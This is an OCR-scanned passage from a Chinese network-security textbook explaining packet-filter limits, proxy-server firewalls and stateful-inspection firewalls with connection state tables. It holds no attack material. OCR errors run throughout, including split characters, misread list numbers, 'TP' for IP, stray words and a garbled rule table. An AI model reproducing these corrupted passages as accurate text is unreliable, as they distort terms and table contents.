入 理解 各 种 Internet 服务 .包头 格式 以 及 每 个 域 的 意义 ,才能 将 过 滤 规 则 集 定义 得 完善 。 因 
此 , 包 过 滤 通 常 是 和 应 用 网 关 配 合 使 用 ,共同 组 成 防火 墙 系统 。 

(2) 随 着 过 滤 规 则 数目 的 增加 .路 由 器 的 吞吐 量 会 下 降 。 
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(3) 过 滤 判 别 的 依据 只 是 网 络 层 和 传输 层 的 有 限 信息 ,对 信息 的 处 理 能 力 非常 有 限 ,过 
滤 无 法 对 网 络 上 流动 的 信息 提供 全 面 的 控制 。 

(4) 只 能 阻止 一 种 类 型 的 IP 欺骗 , 即 外 部 主机 伪装 内 部 主机 的 IP, 对 于 外 部 主机 伪装 
其 他 可 信任 的 外 部 主机 的 IP 却 不 能 阻止 。 

(5) 一 些 包 过 滤 网 关 不 支持 有 效 的 用 户 认 证 。 大 多 数 过 滤器 中 缺少 审计 和 报警 机 制 ， 
它 只 能 依据 包头 信息 ,不 能 对 用 户 身份 进行 验证 ,很 容易 受到 “地 址 欺骗 型 "攻击 。 

(6) 不 提供 有 用 的 日 志 , 这 使 用 户 意 识 到 网 络 受 攻击 的 难度 加 大 ,更 谈 不 上 根据 日 志 来 
进行 网 络 的 优化 、 完 善 以 及 追查 责任 了 。 

(7) 包 过 滤 是 无 状态 的 ,因为 包 过 滤 不 能 保持 与 传输 相关 的 状态 信息 或 与 应 用 相关 的 
状态 信息 。 

(8) 由 于 缺少 上 下 文 关联 信息 ,一 些 协议 如 UDP、RPC 不 适合 用 数据 包 过 滤 , 如 基于 
RPC 的 应 用 的 r 命令 等 。 


4.3.2 代理 服务 器 技术 


T 





1. 代理 服务 器 基本 概念 
代理 (Proxy) 服 务 器 工作 在 应 用 层 , 它 用 来 提供 应 用 层 服务 的 控制 ,在 内 部 网 络 向 外 部 
网 络 申请 服务 时 起 到 中 间 转 接 作 用 。 内 部 网 络 只 接受 代理 提出 的 服务 请 求 ,拒绝 外 部 网 络 
其 他 节点 的 直接 请 求 。 其 特点 是 完全 “阻隔 ?了 网 络 通信 流 , 通 过 对 每 种 应 用 服务 编制 专门 
的 代理 程序 ,实现 监视 和 控制 应 用 层 通信 流 的 作用 ,其 典型 网 络 结构 如 图 4-27 所 示 。 在 代 
理 服务 器 防火 墙 技术 的 发 展 过 程 中 ,经 历 了 两 个 不 同 的 版 本 ,分 别 为 “第 一 代 应 用 网 关 型 代 
理 防火 墙 " 和 "第 二 代 自 适应 代理 防火 墙 ”。 
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图 4-27 代理 服务 器 防火 墙 网 络 结构 示意 图 







































































代理 服务 器 是 运行 在 防火 墙 主机 上 的 专门 的 应 用 程序 或 者 服务 器 程序 ,防火 墙 主 机 是 
具有 一 个 内 部 网 络 接口 和 一 个 外 部 网 络 接口 的 双重 宿主 主机 ,也 可 以 是 一 些 可 以 访问 
Internet 并 被 内 部 主机 访问 的 堡垒 主机 。 这 些 程序 接受 用 户 对 Internet 服务 的 请 求 (如 
FTP, Telnet) ,并 按照 一 定 的 安全 策略 将 它们 转发 到 实际 的 服务 中 ,代理 提供 代替 连接 并 且 
充当 服务 的 网 关 。 
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2. 代理 服务 器 防火 墙 


代理 服务 器 防火 墙 适 用 于 特定 的 Internet 服务 ,如 HTTP、FTP 等 。 必 须 为 每 一 种 应 
用 服务 设置 专门 的 代理 服务 器 。 例 如 : HTTP 代理 服务 器 是 介 于 浏览 器 和 Web 服务 器 之 
间 的 一 台 服 务 器 ,有 了 它 之 后 ,浏览 器 不 是 直接 到 Web 服务 器 去 取 回 网 页 ,而 是 向 代理 服务 
器 发 出 请 求 ,Request 信号 会 先 送 到 代理 服务 器 ,由 代理 服务 器 来 取 回 浏览 器 所 需要 的 信息 
并 传送 给 用 户 的 浏览 器 。 代 理 服 务 器 防火 墙 对 客户 来 说 是 一 个 服务 器 ,而 对 服务 器 来 说 是 


一 个 客户 端 。 代 理 服 务 器 防火 墙 工 作 原理 如 图 4-28 所 示 。 
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代理 服务 器 防火 墙 通 过 在 主机 上 运行 代理 的 服务 程序 ,直接 对 特定 的 应 用 层 进行 服务 ， 
因此 也 称 为 应 用 型 防火 墙 。 其 核心 是 运行 于 防火 墙 主机 上 的 代理 服务 器 程序 。 针 对 不 同 的 
应 用 程序 (如 HTTP 应 用 、FTP WJH, Telnet 应 用 等 ) ,代理 服务 器 防火 墙 针 对 每 一 种 服务 


检查 发 动机 


4-28 ”代理 服务 器 防火 墙 工作 原理 示意 图 





(如 HTTP 服务 FTP 服务 .Telnet 服务 等 ) 都 要 设计 一 个 代理 (如 HTTP 代理 `FTP 代理 、 





Telnet 代理 等 ) 模 块 ,建立 对 应 的 网 关 层 ,实现 起 来 比较 复杂 。 
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代理 服务 器 防火 墙 也 称 为 应 用 级 网 关 ,通常 运行 在 两 个 网 络 之 间 , 它 对 于 客户 来 说 像 是 
一 台 真 的 服务 器 ,而 对 于 外 界 的 服务 器 来 说 , 它 又 是 一 台 客户 机 ; 当代 理 服务 器 接收 到 用 户 
对 某 站 点 的 访问 请 求 后 ,会 检查 该 请 求 是 否 符合 规定 ,如 果 规 则 允许 用 户 访问 该 站 点 的 话 ， 
代理 服务 器 会 像 一 个 客户 一 样 去 那个 站 点 取 回 所 需 信 息 再 转发 给 客户 。 代 理 服 务 器 防火 墙 































































































工作 流程 如 图 4-29 所 示 。 
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图 4-29 代理 服务 器 防火 墙 工作 流程 示意 图 
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代理 服务 器 通常 都 有 一 个 高 速 缓存 ,这 个 缓存 存储 着 用 户 经 常 访问 的 站 点 内 容 , 在 下 一 
个 用 户 要 访问 同一 站 点 时 ,服务 器 就 不 用 重复 地 获取 相同 的 内 容 , 直 接 将 缓存 内 容 发 出 即 
可 , 既 节 约 了 时 间 也 节约 了 网 络 资源 。 代 理 服务 器 会 像 一 堵 墙 一 样 挡 在 内 部 用 户 与 外 界 之 
间 , 从 外 部 只 能 看 到 该 代理 服务 器 而 无 法 获知 任何 的 内 部 资源 ,如 用 户 的 TP 地 址 等 。 

代理 服务 器 防火 墙 可 以 实现 用 户 认 证 .详细 日 志 、 审 计 跟 踪 和 数据 加 密 等 功能 ,并 实现 
对 具体 协议 及 应 用 的 过 滤 ; 这 种 防火 墙 能 完全 控制 网 络 信息 的 交换 ,控制 会 话 过 程 ,具有 灵 
活性 和 安全 性 ,但 可 能 影响 网 络 的 性 能 。 

3. 代理 服务 器 的 具体 作用 

CD 隐藏 内 部 主机 。 代 理 服务 器 的 作用 之 一 是 隐藏 内 部 网 络 中 的 主机 。 由 于 有 代理 服 
务 器 的 存在 ,所 以 外 部 主机 无 法 直接 连接 到 内 部 主机 。 它 只 能 见 到 代理 服务 器 ,因此 只 能 连 
接 到 代理 服务 器 上 。 这 种 特性 是 十 分 重要 的 ,因为 外 部 用 户 无 法 进行 针对 内 部 网 络 的 探测 ， 
也 就 无 法 对 内 部 网 络 的 主机 发 起 攻击 。 代 理 服 务 器 在 应 用 层 对 数据 包 进 行 更 改 , 以 自己 的 
身份 向 目的 地 重新 发 出 请 求 ,彻底 改变 了 数据 包 的 访问 特性 。 

(D 过 滤 内 容 。 在 应 用 层 进行 检查 的 另 一 个 重要 作用 是 可 以 扫描 数据 包 的 内 容 , 这 些 
内 容 可 能 包含 敏感 的 或 者 被 严格 禁止 流出 用 户 网 络 的 信息 ,以 及 一 些 容易 引起 安全 威胁 的 
数据 。 后 者 包括 不 安全 的 Java Applet 小 程序 、ActiveX 控件 以 及 电子 邮件 中 的 附件 等 。 而 
这 些 内 容 是 包 过 滤 技 术 无 法 控制 的 。 支 持 内 容 的 扫描 是 代理 服务 器 技术 与 其 他 安全 技术 的 
一 个 重要 区 别 。 

G) 提高 系统 性 能 。 虽 然 从 访问 控制 的 角度 考虑 ,代理 服务 器 因为 执行 了 很 细致 的 过 
滤 功 能 而 加 大 了 网 络 访问 的 延迟 。 但 是 它 身 处 网 络 服务 的 最 高 层 , 可 以 综合 利用 缓存 等 多 
种 手段 优化 对 网 络 的 访问 ,由 此 还 进一步 减少 了 因为 网 络 访问 产生 的 系统 负载 。 因 此 ,精心 
配置 的 代理 技术 可 以 提高 系统 的 整体 性 能 。 

(4) 保障 安全 。 安 全 性 的 保障 不 仅 指 过 滤 功 能 的 强大 ,还 包括 对 过 往 数据 日 志 的 详细 
分 析 和 审计 。 这 是 因为 从 这 些 数据 中 能 够 发 现 过 滤 功 能 难以 发 现 的 攻击 行为 序列 ,可 以 及 
时 地 提醒 管理 人 员 采 取 必 要 的 安全 保护 措施 ; 还 可 以 对 网 络 访问 量 进行 统计 进而 优化 网 络 
访问 的 规则 ,为 用 户 提供 更 好 的 服务 。 代 理 技 术 处 于 网 络 协 议 的 最 高 层 ,可 以 为 日 志 的 分 析 
和 审计 提供 最 详尽 的 信息 ,由 此 提高 了 网 络 的 安全 性 。 

(5) 阻 断 URL。 在 代理 服务 器 上 可 以 实现 针对 特定 网 址 及 其 服务 器 的 阻 断 , 以 实现 阻 
止 内 部 用 户 浏览 不 符合 组 织 或 机 构 安 全 策略 的 网 站 内 容 。 

(6) 保护 电子 邮件 。 电 子 邮 件 系 统 是 互联 网 最 重要 的 信息 交互 系统 之 一 ,但 是 其 开放 
性 特点 使 得 它 非常 脆弱 ,而 且 由 于 其 安全 性 较 弱 ,所 以 经 常 被 攻击 者 作为 网 络 攻 击 的 重要 途 
径 。 代 理 服务 器 可 以 实现 对 重要 的 内 部 邮件 服务 器 的 保护 。 通 过 邮件 代理 对 邮件 信息 的 重 
组 与 转发 ,使 得 内 部 邮件 服务 器 不 与 外 部 网 络 发 生 直接 的 联系 ,从 而 达到 保护 的 目的 。 

(7) 身份 认证 。 代 理 服务 器 能 够 实现 包 过 滤 技 术 无 法 实现 的 身份 认证 功能 。 将 身份 认 
证 技术 融合 进 安 全 过 滤 功 能 中 能 够 大 幅度 提高 用 户 的 安全 性 。 支 持 身份 认证 技术 是 现代 防 
火 墙 的 一 个 重要 特征 。 具 体 的 方式 有 传统 的 用 户 账号 /口令 、 基 于 口令 技术 的 挑战 /响应 等 。 

(8) 信息 重 定向 。 代 理 服务 器 从 本 质 上 是 一 种 信息 的 重 定 向 技术 。 这 是 因为 它 可 以 根 
据 用 户 网 络 的 安全 需要 改变 数据 包 的 源 或 目的 地 址 ,将 数据 包 导 引 到 符合 系统 需要 的 地 方 
去 。 这 在 基于 HTTP 协议 的 多 WWW 服务 器 应 用 领域 中 尤为 重要 。 在 这 种 环境 下 ,代理 
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服务 器 起 到 负载 分 配器 和 负载 平衡 器 的 作用 。 

4. 代理 服务 器 的 种 类 

根据 功能 和 具体 实现 位 置 的 不 同 , 可 以 将 代理 服务 器 分 成 应 用 层 网 关 和 电路 级 网 关 两 
种 类 型 。 

CD 应 用 层 网 关 。 应 用 层 网 关 能 够 在 应 用 层 截获 进出 内 部 网 络 的 数据 包 ,运行 代理 
务 器 程序 来 转发 信息 ; 它 能 够 避免 内 部 主机 与 外 部 不 可 信 网 络 之 间 的 直接 连接 ; 应 用 层 
关 仅 接收 、. 过 滤 和 转发 特定 服务 的 数据 包 , 如 HTTP 代理 只 能 处 理 HTTP 数据 流 。 

对 于 那些 没有 在 应 用 层 网 关上 安装 代理 的 服务 来 说 ,将 无 法 进行 网 络 访问 。 应 用 层 网 
关 对 数据 包 进 行 深度 过 滤 ,检查 行为 一 直 深 入 到 网 络 协议 的 应 用 层 。 应 用 层 网 关 不 但 要 对 
报 文 的 首部 各 个 字段 进行 过 滤 , 还 要 对 数据 内 容 进 行 检查 。 应 用 层 网 关 对 于 外 部 网 络 来 说 
是 信息 流 的 源 点 和 终点 ,对 外 完全 屏蔽 了 内 部 网 络 。 

应 用 层 网 关 对 不 同类 型 服务 的 检查 通过 不 同 的 代理 代码 进行 ,由 此 带 来 的 缺点 是 对 每 
一 种 服务 都 要 开发 一 种 专用 的 代理 代码 ,实现 麻烦 也 不 一 定 及 时 ,缺乏 透明 性 。 从 安全 的 角 
度 看 ,其 优点 是 配置 简单 .安全 性 高 ,还 能 支持 很 多 应 用 。 应 用 层 网 关 实 现 HTTP 代理 如 
图 4-30 所 示 o 
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应 用 层 HTTP 代 理 
430 应 用 层 网 关 实 现 HTTP 代理 示意 图 


(2) 电路 级 网 关 。 电 路 级 网 关 工 作 在 会 话 层 ,是 不 同 于 应 用 层 网 关 的 一 种 代理 。 电 路 
级 网 关 可 作为 服务 器 接收 并 转发 外 部 请 求 ,与 内 部 主机 连接 时 则 起 代理 客户 机 的 作用 。 它 
使 用 自己 独立 的 网 络 协议 栈 完成 TCP 的 连接 而 不 使 用 操作 系统 的 协议 栈 , 因 此 可 以 监视 主 
机 建立 连接 时 的 各 种 数据 是 否 合 乎 逻辑 、 会 话 请 求 是 否 合 法 。 一 旦 连接 建立 , 则 只 负责 数据 
的 转发 而 不 进行 过 滤 , 即 电路 级 网 关 用 户 程序 只 在 初次 连接 时 进行 安全 控制 。 用 户 需 要 改 
变 自 己 的 客户 端 程序 来 建立 与 电路 级 网 关 的 通信 通道 ,只 有 这 样 才能 到 达 防 火 墙 另 一 边 的 
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服务 器 。 电 路 级 网 关 实 现 原理 如 图 4-31 所 示 。 
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图 4-31 电路 级 网 关 实现 原理 示意 图 




















5. 代理 服务 器 的 优点 和 缺点 


1) 代理 服务 器 的 优点 

(1) 代理 服务 提供 了 高 速 缓存 。 由 于 大 部 分 信息 都 可 以 重新 使 用 ,所 以 对 同一 个 信息 
有 重复 的 请 求 时 ,可 以 从 缓存 获取 信息 而 不 必 再 次 进行 网 络 连接 ,因此 提高 了 网 络 的 性 能 。 

(2) 因为 代理 服务 器 屏蔽 了 内 部 网 络 , 所 以 阻止 了 一 切 对 内 部 网 络 的 探测 活动 。 

(3) 代理 服务 在 应 用 层 上 建立 ,可 以 更 有 效 地 对 内 容 进行 过 滤 。 

(4) 代理 服务 器 禁止 内 网 与 外 网 的 直接 连接 ,减少 了 内 部 主机 受到 直接 攻击 的 危险 。 

(5) 代理 服务 可 以 提供 各 种 用 户 身份 认证 手段 ,从 而 加 强 服务 的 安全 性 。 

(6) 连接 是 基于 服务 而 非 基 于 物理 连接 ,因此 代理 防火 墙 不 易 受 TP 地 址 欺骗 的 攻击 。 

(7) 代理 服务 提供 了 详细 的 日 志 记录 ,有 助 于 进行 细致 的 日 志 分 析 和 审计 。 

(8) 代理 防火 墙 的 过 滤 规 则 比 包 过 滤 防 火 墙 的 过 滤 规 则 更 简单 。 

2) 代理 服务 器 的 缺点 

CD 代理 服务 程序 很 多 都 是 专用 的 ,不 能 很 好 地 适应 网 络 服务 和 协议 的 不 断 发 展 。 

(2) 在 访问 数据 流量 较 大 的 情况 下 ,代理 技术 会 增加 访问 的 延迟 ,影响 系统 的 性 能 。 

(3) 应 用 层 网 关 需 要 用 户 改变 自己 的 行为 模式 ,不 能 实现 用 户 的 透明 访问 。 

(4) 应 用 层 代 理 不 能 完全 支持 所 有 的 协议 。 

(5) 代理 系统 对 操作 系统 有 明显 的 依赖 性 ,必须 基于 某 个 特定 的 系统 及 其 协议 。 

(6) 相对 于 包 过 滤 技 术 来 说 ,代理 服务 器 技术 执行 的 速度 是 较 慢 的 。 


4.3.3 状态 检测 技术 


1. 状态 检测 基本 概念 

为 了 解决 静态 包 过 滤 技 术 安全 检查 措施 简单 .管理 困难 等 问题 ,计算 机 安全 界 提出 了 状 
态 检测 技术 (Stateful Inspection) 的 概念 。 状 态 检测 技术 可 以 根据 实际 情况 ,动态 地 自动 生 
成 或 删除 安全 过 滤 规 则 ,不 需要 管理 人 员 手 工 配 置 ; 还 可 以 分 析 高 层 协议 ,能 够 更 有 效 地 对 
进出 内 部 网 络 的 通信 进行 监控 ,并 且 提 供 更 好 的 日 志和 审计 分 析 服务 。 早 期 ,状态 检测 技术 
也 称 为 动态 包 过 滤 (Dynamic Packet Filter) ,是 静态 包 过 滤 技 术 在 传输 层 的 扩展 应 用 。 现 
在 ,该 技术 可 以 实现 传输 层 协议 报 文 字段 细节 的 过 滤 ,以 及 部 分 应 用 层 信 息 的 过 滤 。 这 个 时 
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候 才 真正 地 称 为 状态 检测 技术 。 

1) 状态 的 概念 

状态 根据 使 用 协议 的 不 同 而 有 不 同 的 形式 ,可 以 根据 相应 协议 的 有 限 状 态 机 来 定义 ,一 
般 包括 NEW.ESTABLISHED.RELATED 和 CLOSED 等 。 

防火 墙 通常 根据 数据 包 的 源 地 址 、 源 端口 号 .目的 地 址 、 目 的 端口 号 、 使 用 协议 五 元 组 来 
确定 一 个 会 话 , 但 是 这 些 对 于 状态 检测 防火 墙 来 说 还 不 够 。 状 态 检测 防火 墙 要 把 这 些 信息 
记录 在 连接 状态 表 里 并 为 每 个 会 话 分 配 一 条 表 项 记录 ,还 要 在 表 项 中 进一步 记录 会 话 当前 
的 状态 属性 、 顺 序号 .应 答 标记 、 防 火 墙 的 执行 动作 及 最 近 数 据 报 文 的 寿命 等 信息 。 这 些 信 
息 组 合 起 来 才能 真正 地 唯一 标识 一 个 会 话 连接 ,而 且 也 使 得 攻击 者 难以 构造 通过 防火 墙 的 
报 文 。 

A) TCP 状态 。TCP 是 一 个 面向 连接 的 协议 ,对 于 通信 过 程 各 个 阶段 的 状态 都 有 明确 
的 定义 ,并 可 以 通过 TCP 标志 位 进行 跟踪 。TCP 共有 11 个 状态 ,状态 图 如 图 4-32 所 示 。 

(2) UDP 状态 。 将 基于 UDP 的 会 话 的 所 有 数据 报 文 看 作 一 条 UDP 连接 ,并 在 这 个 连 
接 的 基础 上 定义 该 会 话 的 伪 状 态 信息 , 伪 状态 信息 主要 由 源 IP 地 址 .目的 IP 地 址 、 源 端口 
号 及 目的 端口 号 构成 。 双 向 的 数据 流 源 信息 和 目的 信息 正好 相反 ,UDP 是 无 连接 的 ,无 法 
定义 连接 的 结束 状态 。 

(3) ICMP 状态 。ICMP 是 无 连接 的 协议 ,具有 单 向 性 。ICMP 的 状态 和 连接 需要 考虑 
ICMP 报 文 的 类 型 和 代码 字段 的 含义 ,需要 提取 ICMP 报 文 的 内 容 来 决定 其 到 底 与 哪 一 个 
已 有 连接 相关 。 

2) 状态 检测 技术 的 基本 原理 

状态 检测 技术 根据 连接 “状态 ”进行 检查 ,状态 的 具体 定义 参见 上 面部 分 。 当 一 个 连接 
的 初始 数据 报 文 到 达 执 行 状态 检测 的 防火 墙 时 ,首先 要 检查 该 报 文 是 否 符合 安全 过 滤 规 则 
的 规定 。 如 果 该 报 文 与 规定 相符 合 , 则 将 该 连接 的 信息 记录 下 来 并 自动 添加 一 条 允许 该 连 
接 通过 的 过 滤 规 则 ,然后 向 目的 地 转发 该 报 文 。 以 后 凡是 属于 该 连接 的 数据 防火 墙 一 律 予 
以 放行 ,包括 从 内 向 外 的 和 从 外 向 内 的 双向 数据 流 。 在 通信 结束 、 释 放 该 连接 以 后 ,防火 墙 
将 自动 删除 关于 该 连接 的 过 滤 规 则 。 动 态 过 滤 规 则 存储 在 连接 状态 表 中 ,并 由 防火 墙 维护 。 
为 了 更 好 地 为 用 户 提 供 网 络 服务 及 更 精确 地 执行 安全 过 滤 ,状态 检测 技术 需要 查看 网 络 层 
和 应 用 层 的 信息 ,但 主要 还 在 传输 层 上 工作 。 

2. 状态 检测 防火 墙 

状态 检测 技术 是 防火 墙 近 几 年 才 应 用 的 新 技术 。 传 统 的 包 过 滤 防 火 墙 只 是 通过 检测 
IP 包头 的 相关 信息 来 决定 数据 流 是 通过 还 是 拒绝 ,状态 检测 防火 墙 采用 的 是 一 种 基于 连接 
的 状态 检测 机 制 ,将 属于 同一 连接 的 所 有 包 作 为 一 个 整体 的 数据 流 看 待 ,构成 连接 状态 表 ， 
通过 规则 表 与 状态 表 的 共同 配合 ,对 表 中 的 各 个 连接 状态 因素 加 以 识别 。 这 里 动态 连接 状 
态 表 中 的 记录 可 以 是 以 前 的 通信 信息 ,也 可 以 是 其 他 相关 应 用 程序 的 信息 ; 与 传统 包 过 滤 
防火 墙 的 静态 过 滤 规 则 表 相 比 ,状态 检测 技术 具有 更 好 的 灵活 性 和 安全 性 。 状 态 检测 防火 
墙 是 包 过 滤 技 术 及 应 用 代理 技术 的 一 个 折 中 。 

(1) 通信 信息 。 所 有 7 层 协议 的 当前 信息 。 防 火 墙 的 检测 模块 位 于 操作 系统 的 内 核 ， 
在 网 络 层 之 下 ,能 在 数据 包 到 达 网 关 操作 系统 之 前 对 它们 进行 分 析 。 防 火 墙 先 在 低 协 议 层 
上 检查 数据 包 是 否 满足 企业 的 安全 策略 ,对 于 满足 的 数据 包 , 再 从 更 高 协议 层 上 进行 分 析 。 
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4-32 TCP 连接 状态 示意 图 


它 验 证 数据 的 源 地 址 .目的 地 址 和 端口 号 ,协议 类 型 .应 用 信息 等 多 层 的 标志 ,因此 具有 更 全 
面 的 安全 性 。 

(2) 通信 状态 。 即 以 前 的 通信 信息 。 对 于 简单 的 包 过 滤 防 火 墙 ,如 果 要 允许 FTP 通 
过 ,就 必须 做 出 让 步 而 打开 许多 端口 ,这 样 就 降低 了 安全 性 。 状 态 检测 防火 墙 在 状态 表 中 保 
存 以 前 的 通信 信息 ,记录 从 受 保护 网 络 发 出 的 数据 包 的 状态 信息 ,如 FTP 请 求 的 服务 器 地 
址 和 端口 .客户 端 地 址 和 为 满足 此 次 FTP 临时 打开 的 端口 ,然后 防火 墙根 据 该 表 内 容 对 
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返回 受 保护 网 络 的 数据 包 进 行 分 析 判 断 ,这 样 ,只 有 响应 受 保护 网 络 请 求 的 数据 包 才 被 
放行 。 这 里 ,对 于 UDP 或 者 RPC 等 无 连接 的 协议 ,检测 模块 可 创建 虚 会 话 信息 来 进行 
跟踪 。 

(3) 应 用 状态 。 即 其 他 相关 应 用 的 信息 。 状 态 检 测 模 块 能 够 理解 并 学 习 各 种 协议 和 应 
用 ,以 支持 各 种 最 新 的 应 用 , 它 比 代理 服务 器 支持 的 协议 和 应 用 要 多 得 多 ; 并 且 , 它 能 从 应 
用 程序 中 收集 状态 信息 存 入 状态 表 中 ,以 供 其 他 应 用 或 协议 制定 检测 策略 。 例 如 ,已 经 通过 
防火 墙 认证 的 用 户 可 以 通过 防火 墙 访问 其 他 授权 的 服务 。 

CD 操作 信息 。 即 在 数据 包 中 能 执行 逻辑 或 数学 运算 的 信息 。 状 态 检 测 技术 采用 强大 
的 面向 对 象 的 方法 ,基于 通信 信息 ,通信 状态 .应 用 状态 等 多 方面 因素 ,利用 灵活 的 表达 式 形 
式 , 结 合 安全 规则 应 用 识别 知识 ,状态 关联 信息 以 及 通信 数据 ,构造 更 复杂 的 、 更 灵活 的 、 能 
满足 用 户 特定 安全 要 求 的 策略 规则 。 

(5) 状态 检测 防火 墙 的 运行 方式 。 当 一 个 数据 包 到 达 状 态 检 测 防火 墙 时 ,首先 通过 一 
个 动态 建立 的 连接 状态 表 判 断 数据 包 是 否 属于 一 个 已 建立 的 连接 。 这 个 连接 状态 表 包 含 目 
的 地 址 \ 目 的 端口 号 、 源 地 址 \ 源 端口 号 等 及 对 该 数据 连接 采取 的 策略 (丢弃 拒绝 或 是 转发 ) 
(如 图 4-33 所 示 )。 连 接 状 态 表 ( 如 表 4-5 所 示 ) 中 记录 了 所 有 已 建立 连接 的 数据 包 信息 。 
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4-33 ”连接 状态 表 基 本 原理 示意 图 


表 4-5 连接 状态 表 





行为 源 地 址 目的 地 址 协议 Hmo 目的 端口 码 子 位 规则 

允许 内 部 网 络 地 址 ”外 部 网 络 地 址 TCP ”任意 80 任意 ”数据 包 是 先前 连接 
的 一 部 分 

允许 “外 部 网 络 地 址 ”内 部 网 络 地 址 TCP 80 1023 ACK ”先前 有 出 站 数据 包 

拒绝 ”所 有 所 有 所 有 MWA 所 有 所 有 其 他 


如 果 数 据 包 与 连接 状态 表 匹 配 , 即 属于 一 个 已 建立 的 连接 , 则 根据 连接 状态 表 的 策略 对 
数据 包 实 施 丢弃 、 拒 绝 或 是 转发 操作 。 

如 果 数 据 包 不 属于 一 个 已 建立 的 连接 , 即 数据 包 与 连接 状态 表 不 匹配 ,那么 防火 墙 则 会 
检查 数据 包 是 否 与 它 所 配置 的 规则 集 相 匹配 。 大 多 数 状态 检测 防火 墙 的 规则 仍然 与 普通 的 


166 网 络 安全 技术 (第 2 版 ) 





包 过 滤 相似 ,也 有 的 状态 检测 防火 墙 对 应 用 层 的 信息 进行 检查 。 例 如 ,可 以 通过 检查 内 网 发 
往外 网 的 FTP 协议 数据 包 中 是 否 有 put 命令 来 阻 断 内 网 用 户 向 外 网 的 服务 器 上 传 数据 。 
与 此 同时 ,状态 检测 防火 墙 将 建立 起 连接 状态 表 , 记 录 该 连接 的 地 址 信息 以 及 对 此 连接 数据 
包 的 策略 。 

状态 检测 防火 墙 工作 在 TCP/IP 各 层 , 检 查 由 防火 墙 转发 的 包 , 并 创建 相应 的 结构 记录 
连接 的 状态 。 它 的 检查 项 包括 链 路 层 ,网 络 层 ,传输 层 、 应 用 层 的 各 种 信息 ,并 根据 规则 表 或 
状态 表 来 决定 是 否 允 许 转发 包 通过 ,其 工作 原理 如 图 4-34 所 示 。 
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图 4-34 ”状态 检测 防火 墙 工作 原理 示意 图 


状态 检测 防火 墙 在 网 络 层 由 一 个 检测 模块 截获 数据 包 , 并 抽取 与 应 用 层 状 态 有 关 的 信 
息 , 并 以 此 作为 依据 决定 对 该 连接 是 接受 还 是 拒绝 。 检 测 模块 维护 一 个 动态 的 状态 信息 表 ， 
并 对 后 续 的 数据 包 进 行 检查 。 一 旦 发 现任 何 连接 的 参数 有 意外 的 变化 ,该 连接 就 被 中 止 。 
这 种 技术 提供 了 高 度 安全 的 解决 方案 ,同时 也 具有 和 较 好 的 适应 性 和 可 扩展 性 。 

状态 检测 防火 墙 克服 了 包 过 滤 防 火 墙 和 应 用 代理 服务 器 的 局 限 性 ,不 要 求 每 个 被 访问 
的 应 用 都 有 代理 。 状 态 检测 模块 能 够 理解 并 学 习 各 种 协议 和 应 用 ,以 支持 各 种 最 新 的 应 用 
服务 。 状 态 检测 模块 截获 分析 并 处 理 所 有 试图 通过 防火 墙 的 数据 包 ,保证 网 络 的 高 度 安全 
和 数据 完整 以 及 各 种 应 用 的 通信 状态 动态 存储 、 更 新 到 动态 状态 表 中 ,结合 预定 义 好 的 规则 
实现 安全 策略 。 状 态 检 测 检查 OSI 七 层 模型 的 所 有 层 , 以 决定 是 否 过 滤 ,而 不 仅 只 对 网 络 
层 进 行 检查 ,具体 工作 流程 如 图 4-35 所 示 。 
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图 4-35 状态 检测 防火 墙 工作 流程 示意 图 
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3. 状态 检测 防火 墙 的 主要 特点 

目前 许多 包 过 滤 防 火 墙 中 都 使 用 多 层 状态 检测 ,其 主要 特点 如 下 。 

COD 安全 性 。 状 态 检测 防火 墙 工 作 在 数据 链 路 层 和 网 络 层 之 间 ,截取 和 检查 所 有 通过 
网 络 的 原始 数据 包 并 进行 处 理 。 首 先 根据 安全 策略 从 数据 包 中 提取 有 用 信息 ,并 保存 在 内 
存 中 。 然 后 将 相关 信息 组 合 起 来 ,进行 一 些 逻 辑 或 数学 运算 并 进行 相应 的 操作 ,如 允许 或 拒 
绝 数据 包 通 过 、 认 证 连接 和 加 密 数据 等 。 

状态 检测 防火 墙 虽然 工作 在 协议 栈 较 低层 ,但 它 检测 所 有 应 用 层 的 数据 包 , 并 从 中 提取 
有 用 信息 ,如 IP 地 址 、 端 口号 和 数据 内 容 等 ,这 样 其 安全 性 就 得 到 很 大 的 提高 。 

(2) 高 效 性 。 通 过 防火 墙 的 所 有 数据 包 都 在 低层 处 理 , 减 少 了 高 层 协议 头 的 开销 ,执行 
效率 提高 很 多 。 另 外 ,在 这 种 防火 墙 中 ,一 旦 一 个 连接 建立 起 来 ,就 不 用 再 对 该 连接 做 更 多 
的 工作 。 例 如 ,一 个 通过 了 身份 验证 的 用 户 试图 打开 另 一 个 浏览 器 ,状态 检测 防火 墙 会 自动 
授予 该 计算 机 再 建立 其 他 会 话 的 权限 ,而 不 会 提示 该 用 户 再 输入 口令 。 

(3) 可 伸缩 性 和 易 扩 展 性 。 状 态 检测 防火 墙 不 像 应 用 层 网 关 防 火 墙 , 每 个 应 用 对 应 一 
个 服务 程序 ,所 能 提供 的 服务 是 有 限 的 ,而 且 当 增 加 一 个 新 的 服务 时 ,必须 为 新 的 服务 开发 
相应 的 服务 程序 。 状 态 检测 防火 墙 不 区 分 每 个 具体 的 应 用 ,只 是 根据 从 数据 包 中 提取 出 的 
信息 、 对 应 的 安全 策略 及 过 滤 规 则 处 理 数 据 包 。 当 有 一 个 新 的 应 用 时 , 它 能 动态 产生 并 应 用 
新 的 规则 ,而 不 用 另外 编写 代码 ,所 以 具有 很 好 的 可 伸缩 性 和 易 扩展 性 。 

(4) 应 用 范围 广 。 状 态 检 测 防火 墙 不 仅 支 持 基 于 TCP 的 应 用 ,而 且 支 持 基 于 无 连接 协 
议 的 应 用 ,如 RPC(Remote Procedure Call) .UDP(DNS、WAIS 等 )。 对 于 无 连接 的 协议 , 包 
过 渡 防 火 墙 和 应 用 层 网 关 要 么 不 支持 这 类 应 用 ,要 么 开放 一 个 大 范围 的 UDP 端口 ,这 样 会 
暴露 内 部 网 ,降低 了 安全 性 。 

状态 检测 技术 更 适合 提供 对 UDP 协议 的 支持 。 它 将 所 有 通过 防火 墙 的 UDP 分 组 均 
视 为 一 个 虚拟 连接 ,防火 墙 保 存 通 过 网 关 的 每 一 个 连接 的 状态 信息 ,允许 通过 防火 墙 的 
UDP 请 求 都 会 被 记录 。 当 UDP 包 在 相反 方向 上 通过 时 ,依据 连接 状态 表 确 定 该 UDP 包 是 
否 被 授权 和 通过 。 每 个 虚拟 连接 都 具有 一 定 的 生存 期 , 较 长 时 间 没 有 数据 传送 的 连接 将 被 
终止 。 

4. 防火 墙 关键 技术 比较 

